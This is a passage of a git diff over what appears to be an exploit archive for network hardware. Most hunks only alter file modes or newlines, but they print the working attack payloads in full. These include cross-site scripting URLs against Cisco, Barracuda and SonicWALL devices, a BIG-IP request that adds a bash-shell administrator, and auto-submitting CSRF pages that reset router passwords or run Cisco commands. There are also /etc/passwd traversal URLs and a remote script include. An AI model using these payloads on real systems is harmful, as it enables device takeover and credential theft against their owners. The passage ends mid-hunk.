a/platforms/hardware/remote/31132.txt b/platforms/hardware/remote/31132.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31133.txt b/platforms/hardware/remote/31133.txt old mode 100755 new mode 100644 index e686684c2..1e1c1d07a --- a/platforms/hardware/remote/31133.txt +++ b/platforms/hardware/remote/31133.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to execute arbitrary actions o F5 BIG-IP 9.4.3 is vulnerable; other versions may also be affected. -https://www.example.com/tmui/Control/form?handler=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe&handler_before=&form_page=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe.jsp%3F&form_page_before=&bigpipe_output=&bigpipe_cmd_validation=NO_VALIDATION&bigpipe_cmd_before=&bigpipe_cmd=user+testuser+password+none+testpwd+shell+%2Fbin%2Fbash+role+administrator+in+all \ No newline at end of file +https://www.example.com/tmui/Control/form?handler=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe&handler_before=&form_page=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe.jsp%3F&form_page_before=&bigpipe_output=&bigpipe_cmd_validation=NO_VALIDATION&bigpipe_cmd_before=&bigpipe_cmd=user+testuser+password+none+testpwd+shell+%2Fbin%2Fbash+role+administrator+in+all \ No newline at end of file diff --git a/platforms/hardware/remote/31298.txt b/platforms/hardware/remote/31298.txt old mode 100755 new mode 100644 index 75cfd0536..0739f87fe --- a/platforms/hardware/remote/31298.txt +++ b/platforms/hardware/remote/31298.txt @@ -4,4 +4,4 @@ Packeteer PacketShaper and PolicyCenter are prone to a cross-site scripting vuln An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -https://www.example.com/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E \ No newline at end of file +https://www.example.com/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E \ No newline at end of file diff --git a/platforms/hardware/remote/31311.txt b/platforms/hardware/remote/31311.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31340.html b/platforms/hardware/remote/31340.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31342.txt b/platforms/hardware/remote/31342.txt old mode 100755 new mode 100644 index 511cae6fd..105971425 --- a/platforms/hardware/remote/31342.txt +++ b/platforms/hardware/remote/31342.txt @@ -11,4 +11,4 @@ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 22 -DialogText=&Advanced=1 \ No newline at end of file +DialogText=&Advanced=1 \ No newline at end of file diff --git a/platforms/hardware/remote/31364.txt b/platforms/hardware/remote/31364.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31683.php b/platforms/hardware/remote/31683.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31698.txt b/platforms/hardware/remote/31698.txt old mode 100755 new mode 100644 index 446ae5a62..948832f31 --- a/platforms/hardware/remote/31698.txt +++ b/platforms/hardware/remote/31698.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FirePass 4100 SSL VPN Firmware 5.4.2-5.5.2 and 6.0-6.2 are vulnerable. -http://www.example.com/installControl.php3?1&%22%3E%3C/script%3E%3Ctextarea%3EHtml%20injection%3C/textarea%3E%3C!--= http://www.example.com/installControl.php3?>'"><script>alert(514)</script> \ No newline at end of file +http://www.example.com/installControl.php3?1&%22%3E%3C/script%3E%3Ctextarea%3EHtml%20injection%3C/textarea%3E%3C!--= http://www.example.com/installControl.php3?>'"><script>alert(514)</script> \ No newline at end of file diff --git a/platforms/hardware/remote/31828.txt b/platforms/hardware/remote/31828.txt old mode 100755 new mode 100644 index 339e29d6a..c80ebc098 --- a/platforms/hardware/remote/31828.txt +++ b/platforms/hardware/remote/31828.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Firmware prior to Barracuda Spam Firewall 3.5.11.025 is vulnerable. -https://www.example.com/cgi-bin/ldap_test.cgi?host=127.0.0.1&port=1&tl s_mode=tls_mode&tls_require=&username=&password=&filter=&searchbase=&uni que_attr=&email_attr=&domain=*&email=%3Cscript%3Ealert(document.cookie)% 3C/script%3E \ No newline at end of file +https://www.example.com/cgi-bin/ldap_test.cgi?host=127.0.0.1&port=1&tl s_mode=tls_mode&tls_require=&username=&password=&filter=&searchbase=&uni que_attr=&email_attr=&domain=*&email=%3Cscript%3Ealert(document.cookie)% 3C/script%3E \ No newline at end of file diff --git a/platforms/hardware/remote/31862.txt b/platforms/hardware/remote/31862.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31863.txt b/platforms/hardware/remote/31863.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31864.txt b/platforms/hardware/remote/31864.txt old mode 100755 new mode 100644 index cd64a23c0..91f949d54 --- a/platforms/hardware/remote/31864.txt +++ b/platforms/hardware/remote/31864.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Xerox DocuShare 6 and prior versions are vulnerable. -http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS \ No newline at end of file +http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS \ No newline at end of file diff --git a/platforms/hardware/remote/31885.txt b/platforms/hardware/remote/31885.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/31886.txt b/platforms/hardware/remote/31886.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/32336.txt b/platforms/hardware/remote/32336.txt old mode 100755 new mode 100644 index 5ca267301..109d77c30 --- a/platforms/hardware/remote/32336.txt +++ b/platforms/hardware/remote/32336.txt @@ -4,4 +4,4 @@ D-Link DIR-100 is affected by a vulnerability that allows attackers to bypass se D-Link DIR-100 devices with firmware 1.12 are vulnerable; other versions may be affected as well. -http://www.example.com/?foo=aaa(...) \ No newline at end of file +http://www.example.com/?foo=aaa(...) \ No newline at end of file diff --git a/platforms/hardware/remote/32390.html b/platforms/hardware/remote/32390.html old mode 100755 new mode 100644 index a940ec123..e39d6f74d --- a/platforms/hardware/remote/32390.html +++ b/platforms/hardware/remote/32390.html @@ -6,4 +6,4 @@ Successful exploits can run arbitrary commands on affected devices. This may lea The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected. -<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="asdf.submit();"> <form name=asdf method="post" action="http://example.com/level/15/exec/-"> <input type=hidden name=command value="show privilege"> <input type=hidden name=command_url value="/level/15/exec/-"> </body> </html> \ No newline at end of file +<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="asdf.submit();"> <form name=asdf method="post" action="http://example.com/level/15/exec/-"> <input type=hidden name=command value="show privilege"> <input type=hidden name=command_url value="/level/15/exec/-"> </body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/32391.html b/platforms/hardware/remote/32391.html old mode 100755 new mode 100644 index 4983cbc69..fb8cf00dc --- a/platforms/hardware/remote/32391.html +++ b/platforms/hardware/remote/32391.html @@ -6,4 +6,4 @@ Successful exploits can run arbitrary commands on affected devices. This may lea The 871 Integrated Services Router under IOS 12.4 is vulnerable; other products and versions may also be affected. -<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://example.com/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html> \ No newline at end of file +<!-- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com] Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #2 Replace "example.com" with the IP address of the target router, embed this in a web page and hope for the best. Cisco Admin's + Safari are the best targets ;) --> <html> <body> <body onload="fdsa.submit();"> <form name=fdsa method="post" action="http://example.com/level/15/exec/-/configure/http"> <input type=hidden name=command value="alias exec xx xx"> <input type=hidden name=command_url value="/level/15/exec/-"> <input type=hidden name=new_command_url value="/level/15/configure/-"> </body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/32469.txt b/platforms/hardware/remote/32469.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/32552.txt b/platforms/hardware/remote/32552.txt old mode 100755 new mode 100644 index 83eb8122e..482ae6ea0 --- a/platforms/hardware/remote/32552.txt +++ b/platforms/hardware/remote/32552.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to SonicWALL Content Filtering on SonicOS Enhanced 4.0.1.1 are vulnerable. -http://www.example.com/fuck<script>alert(document.cookie</script> \ No newline at end of file +http://www.example.com/fuck<script>alert(document.cookie</script> \ No newline at end of file diff --git a/platforms/hardware/remote/32582.txt b/platforms/hardware/remote/32582.txt old mode 100755 new mode 100644 index 0207f7df0..bad0015ec --- a/platforms/hardware/remote/32582.txt +++ b/platforms/hardware/remote/32582.txt @@ -9,4 +9,4 @@ Belkin F5D8233-4 is vulnerable; other devices may also be affected. Enable remote management on port 8080: /cgi-bin/system_setting.exe?remote_mgmt_enabled=1&remote_mgmt_port=8080 Restore the router's default factory settings: /cgi-bin/restore.exe Reboot the router: /cgi-bin/restart.exe -Log in with the default password": /cgi-bin/login.exe?pws= \ No newline at end of file +Log in with the default password": /cgi-bin/login.exe?pws= \ No newline at end of file diff --git a/platforms/hardware/remote/32591.txt b/platforms/hardware/remote/32591.txt old mode 100755 new mode 100644 index b733452d1..03df6916c --- a/platforms/hardware/remote/32591.txt +++ b/platforms/hardware/remote/32591.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/32358/info Successfully exploiting these issues will allow an attacker to obtain administrative credentials, bypass security mechanisms, or run attacker-supplied HTML and script code in the context of the web administration interface. The attacker may then be able to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible. -snmpset -v2c -c private 192.168.1.1 sysName.0 s "PAYLOAD_GOES_HERE" \ No newline at end of file +snmpset -v2c -c private 192.168.1.1 sysName.0 s "PAYLOAD_GOES_HERE" \ No newline at end of file diff --git a/platforms/hardware/remote/32599.txt b/platforms/hardware/remote/32599.txt old mode 100755 new mode 100644 index 3b5d9c1eb..87d538d1d --- a/platforms/hardware/remote/32599.txt +++ b/platforms/hardware/remote/32599.txt @@ -6,4 +6,4 @@ Attackers may exploit this issue by enticing victims into opening a malicious UR An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials, cause denial-of-service conditions, and launch other attacks. -http://www.example.com/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15 \ No newline at end of file +http://www.example.com/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15 \ No newline at end of file diff --git a/platforms/hardware/remote/32681.txt b/platforms/hardware/remote/32681.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/32723.txt b/platforms/hardware/remote/32723.txt old mode 100755 new mode 100644 index 8d23ee8aa..cbe211833 --- a/platforms/hardware/remote/32723.txt +++ b/platforms/hardware/remote/32723.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues are tracked by Cisco bug IDs CSCsi13344 and CSCsr72301. -http://www.example.com/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script> \ No newline at end of file +http://www.example.com/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script> \ No newline at end of file diff --git a/platforms/hardware/remote/32743.txt b/platforms/hardware/remote/32743.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/32776.txt b/platforms/hardware/remote/32776.txt old mode 100755 new mode 100644 index 1ae9b6631..a313aeee8 --- a/platforms/hardware/remote/32776.txt +++ b/platforms/hardware/remote/32776.txt @@ -8,4 +8,4 @@ Note that this issue may be related to an issue described in BID 33260 (Cisco IO Cisco IOS 12.4(23) is vulnerable; other versions may also be affected. -http://www.example.com/level/15/exec/-/"><body onload=alert("bug")> http://www.example.com/exec/"><body onload="alert('bug');"> \ No newline at end of file +http://www.example.com/level/15/exec/-/"><body onload=alert("bug")> http://www.example.com/exec/"><body onload="alert('bug');"> \ No newline at end of file diff --git a/platforms/hardware/remote/32801.txt b/platforms/hardware/remote/32801.txt old mode 100755 new mode 100644 index 199508928..3f0ac0e62 --- a/platforms/hardware/remote/32801.txt +++ b/platforms/hardware/remote/32801.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Barracuda Load Balancer 640 is vulnerable; other versions may also be affected. -http://www.example.com/cgi-mod/index.cgi?realm="><script>alert(â??XSS Possible!!!â??)</script> \ No newline at end of file +http://www.example.com/cgi-mod/index.cgi?realm="><script>alert(â??XSS Possible!!!â??)</script> \ No newline at end of file diff --git a/platforms/hardware/remote/32878.txt b/platforms/hardware/remote/32878.txt old mode 100755 new mode 100644 index 9a54f8937..6ae17cffc --- a/platforms/hardware/remote/32878.txt +++ b/platforms/hardware/remote/32878.txt @@ -23,4 +23,4 @@ Cache-Control: no-cache Cookie: webvpnlogin=1 Content-Length: 66 -username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset= \ No newline at end of file +username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset= \ No newline at end of file diff --git a/platforms/hardware/remote/32919.txt b/platforms/hardware/remote/32919.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/32931.html b/platforms/hardware/remote/32931.html old mode 100755 new mode 100644 index f18db1543..d1a2e2af7 --- a/platforms/hardware/remote/32931.html +++ b/platforms/hardware/remote/32931.html @@ -6,4 +6,4 @@ Successful attacks will lead to a compromise of the vulnerable device, which may Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected. -<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT> \ No newline at end of file +<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT> \ No newline at end of file diff --git a/platforms/hardware/remote/32938.c b/platforms/hardware/remote/32938.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/3294.txt b/platforms/hardware/remote/3294.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/32954.txt b/platforms/hardware/remote/32954.txt old mode 100755 new mode 100644 index d9ab4120b..d142defbb --- a/platforms/hardware/remote/32954.txt +++ b/platforms/hardware/remote/32954.txt @@ -9,4 +9,4 @@ Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera firmware 1.00R22 and http://www.example.com/adm/file.cgi?next_file=%2fetc%2fpasswd http://www.example.com/adm/file.cgi?next_file=%2fetc/passwd http://www.example.com/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd -http://www.example.com/adm/file.cgi?todo=pwnage&this_file=/etc/passwd \ No newline at end of file +http://www.example.com/adm/file.cgi?todo=pwnage&this_file=/etc/passwd \ No newline at end of file diff --git a/platforms/hardware/remote/32955.js b/platforms/hardware/remote/32955.js old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33010.txt b/platforms/hardware/remote/33010.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33016.txt b/platforms/hardware/remote/33016.txt old mode 100755 new mode 100644 index 3d932451f..6b69c8ac5 --- a/platforms/hardware/remote/33016.txt +++ b/platforms/hardware/remote/33016.txt @@ -13,4 +13,4 @@ SSL-VPN 4000 firmware prior to 3.5.0.5 https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x -https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n \ No newline at end of file +https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n \ No newline at end of file diff --git a/platforms/hardware/remote/33044.html b/platforms/hardware/remote/33044.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33045.html b/platforms/hardware/remote/33045.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33046.html b/platforms/hardware/remote/33046.html old mode 100755 new mode 100644 index 2c9aaf257..2b72578f0 --- a/platforms/hardware/remote/33046.html +++ b/platforms/hardware/remote/33046.html @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow attackers to bypass the Mail's call NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it. -<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <script lang=javascript> l = "<iframe src=\"sms:"; for (i = 0; i < 10000; i++) { l = l + "3340948034298232"; } l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>"; document.write(l); </script> </body> </html> \ No newline at end of file +<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <script lang=javascript> l = "<iframe src=\"sms:"; for (i = 0; i < 10000; i++) { l = l + "3340948034298232"; } l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>"; document.write(l); </script> </body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/33054.txt b/platforms/hardware/remote/33054.txt old mode 100755 new mode 100644 index ecd6fc304..5f8130dd0 --- a/platforms/hardware/remote/33054.txt +++ b/platforms/hardware/remote/33054.txt @@ -13,4 +13,4 @@ Versions prior to ASA 8.0.4.34 and 8.1.2.25 are vulnerable. The following example is available: -/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a \ No newline at end of file +/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a \ No newline at end of file diff --git a/platforms/hardware/remote/33055.html b/platforms/hardware/remote/33055.html old mode 100755 new mode 100644 index 50653dd29..2df405b84 --- a/platforms/hardware/remote/33055.html +++ b/platforms/hardware/remote/33055.html @@ -8,4 +8,4 @@ This issue is documented by Cisco Bug ID CSCsy80694. Cisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable. -<html><script> function a(b, c) { return "alert('Your VPN location:\\n\\n'+" + "document.location+'\\n\\n\\n\\n\\n" + "Your VPN cookie:\\n\\n'+document.cookie);"; } CSCO_WebVPN['process'] = a; csco_wrap_js(''); </script></html> \ No newline at end of file +<html><script> function a(b, c) { return "alert('Your VPN location:\\n\\n'+" + "document.location+'\\n\\n\\n\\n\\n" + "Your VPN cookie:\\n\\n'+document.cookie);"; } CSCO_WebVPN['process'] = a; csco_wrap_js(''); </script></html> \ No newline at end of file diff --git a/platforms/hardware/remote/33165.txt b/platforms/hardware/remote/33165.txt old mode 100755 new mode 100644 index 8e003cc8d..4d5a063e3 --- a/platforms/hardware/remote/33165.txt +++ b/platforms/hardware/remote/33165.txt @@ -9,4 +9,4 @@ Unauthenticated attackers can leverage this issue to change the router's adminis The following example URIs are available: http://gateway.example.net?xslt?page=CD35_SETUP_01 -http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512* \ No newline at end of file +http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512* \ No newline at end of file diff --git a/platforms/hardware/remote/33177.txt b/platforms/hardware/remote/33177.txt old mode 100755 new mode 100644 index 5c018b97f..874c1ac05 --- a/platforms/hardware/remote/33177.txt +++ b/platforms/hardware/remote/33177.txt @@ -12,4 +12,4 @@ The following example URIs are available: http://www.example.com/router-info.htm http://www.example.com/cgi-bin/router-info.htm -http://www.example.com/cgi-bin/NETGEAR_WNR2000.cfg \ No newline at end of file +http://www.example.com/cgi-bin/NETGEAR_WNR2000.cfg \ No newline at end of file diff --git a/platforms/hardware/remote/33234.txt b/platforms/hardware/remote/33234.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33257.txt b/platforms/hardware/remote/33257.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33258.txt b/platforms/hardware/remote/33258.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33259.txt b/platforms/hardware/remote/33259.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33260.txt b/platforms/hardware/remote/33260.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33261.txt b/platforms/hardware/remote/33261.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33265.js b/platforms/hardware/remote/33265.js old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33423.txt b/platforms/hardware/remote/33423.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33471.txt b/platforms/hardware/remote/33471.txt old mode 100755 new mode 100644 index c3dc72e30..f27e220d3 --- a/platforms/hardware/remote/33471.txt +++ b/platforms/hardware/remote/33471.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example data is available: -The POST variable nickname has been set to 1>">"> \ No newline at end of file +The POST variable nickname has been set to 1>">"> \ No newline at end of file diff --git a/platforms/hardware/remote/33567.txt b/platforms/hardware/remote/33567.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33568.txt b/platforms/hardware/remote/33568.txt old mode 100755 new mode 100644 index 0096bbd8c..d5e95323c --- a/platforms/hardware/remote/33568.txt +++ b/platforms/hardware/remote/33568.txt @@ -9,4 +9,4 @@ MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also The following example URIs are available: http://www.example.com/config.xml.sav -http://www.example.com/config.xml.save \ No newline at end of file +http://www.example.com/config.xml.save \ No newline at end of file diff --git a/platforms/hardware/remote/33580.txt b/platforms/hardware/remote/33580.txt old mode 100755 new mode 100644 index 7b5f157bc..4baf396bf --- a/platforms/hardware/remote/33580.txt +++ b/platforms/hardware/remote/33580.txt @@ -4,4 +4,4 @@ Comtrend CT-507 IT is prone to a cross-site scripting vulnerability because the An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1 \ No newline at end of file +http://www.example.com/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1 \ No newline at end of file diff --git a/platforms/hardware/remote/33648.txt b/platforms/hardware/remote/33648.txt old mode 100755 new mode 100644 index 7277af7f8..b9213b280 --- a/platforms/hardware/remote/33648.txt +++ b/platforms/hardware/remote/33648.txt @@ -6,4 +6,4 @@ Successful exploits may allow attackers to run privileged commands on the affect The following example URI is available: -http://www.example.com/password.cgi?sysPassword=BASE64_NEW_PASSWORD \ No newline at end of file +http://www.example.com/password.cgi?sysPassword=BASE64_NEW_PASSWORD \ No newline at end of file diff --git a/platforms/hardware/remote/33739.txt b/platforms/hardware/remote/33739.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33741.txt b/platforms/hardware/remote/33741.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33742.txt b/platforms/hardware/remote/33742.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33869.txt b/platforms/hardware/remote/33869.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/33938.txt b/platforms/hardware/remote/33938.txt old mode 100755 new mode 100644 index 094a80c4b..6a51dcd56 --- a/platforms/hardware/remote/33938.txt +++ b/platforms/hardware/remote/33938.txt @@ -25,4 +25,4 @@ Content-length: 101 Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org %2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH -*+Impact+* \ No newline at end of file +*+Impact+* \ No newline at end of file diff --git a/platforms/hardware/remote/33962.txt b/platforms/hardware/remote/33962.txt old mode 100755 new mode 100644 index d1b2fca36..58cacba84 --- a/platforms/hardware/remote/33962.txt +++ b/platforms/hardware/remote/33962.txt @@ -10,4 +10,4 @@ CONNECTION: KEEP-ALIVE GET / HTTP/1.1 HOST: Myserver.com -CONNECTION: KEEP-ALIVE \ No newline at end of file +CONNECTION: KEEP-ALIVE \ No newline at end of file diff --git a/platforms/hardware/remote/34018.txt b/platforms/hardware/remote/34018.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/34033.html b/platforms/hardware/remote/34033.html old mode 100755 new mode 100644 index 689b60538..24ebfeb4a --- a/platforms/hardware/remote/34033.html +++ b/platforms/hardware/remote/34033.html @@ -6,4 +6,4 @@ Successful exploits may allow attackers to run privileged commands on the affect Firmware versions prior to 2.0.2.r1256-100324as are vulnerable. -<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html> \ No newline at end of file +<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html> \ No newline at end of file diff --git a/platforms/hardware/remote/34182.txt b/platforms/hardware/remote/34182.txt old mode 100755 new mode 100644 index 021eb478e..97e95a2d7 --- a/platforms/hardware/remote/34182.txt +++ b/platforms/hardware/remote/34182.txt @@ -13,4 +13,4 @@ The following firmware versions are vulnerable: The following example input to the vulnerable parameter is available: -echo "&lt;/textarea&gt;<script>alert('XSS');</script>" \ No newline at end of file +echo "&lt;/textarea&gt;<script>alert('XSS');</script>" \ No newline at end of file diff --git a/platforms/hardware/remote/34184.txt b/platforms/hardware/remote/34184.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/34200.txt b/platforms/hardware/remote/34200.txt old mode 100755 new mode 100644 index b8a94cc9d..8e778dc47 --- a/platforms/hardware/remote/34200.txt +++ b/platforms/hardware/remote/34200.txt @@ -8,4 +8,4 @@ Firmware versions prior to Cisco ASA 8.1(2) are vulnerable. This issue is being tracked by Cisco Bugid CSCsr09163. -URL: http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom Request: GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0 Host: /www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Response: HTTP/1.0 301 Moved Permanently Server: Web Server Location: https:///www.example2.com/ Location: http:///www.example3.com Content-Type: text/html Content-Length: 125 \ No newline at end of file +URL: http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom Request: GET http://www.example.com/%0d%0aLocation%3a%20http%3a%2f%2fwww%2egoogle%2ecom HTTP/1.0 Host: /www.example.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Response: HTTP/1.0 301 Moved Permanently Server: Web Server Location: https:///www.example2.com/ Location: http:///www.example3.com Content-Type: text/html Content-Length: 125 \ No newline at end of file diff --git a/platforms/hardware/remote/34208.txt b/platforms/hardware/remote/34208.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/34316.txt b/platforms/hardware/remote/34316.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/34465.txt b/platforms/hardware/remote/34465.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/34802.html b/platforms/hardware/remote/34802.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/remote/34986.txt b/platforms/hardware/remote/34986.txt old mode 100755 new mode 100644 index 3a27420d9..fc7e49d42 --- a/platforms/hardware/remote/34986.txt +++ b/platforms/hardware/remote/34986.txt 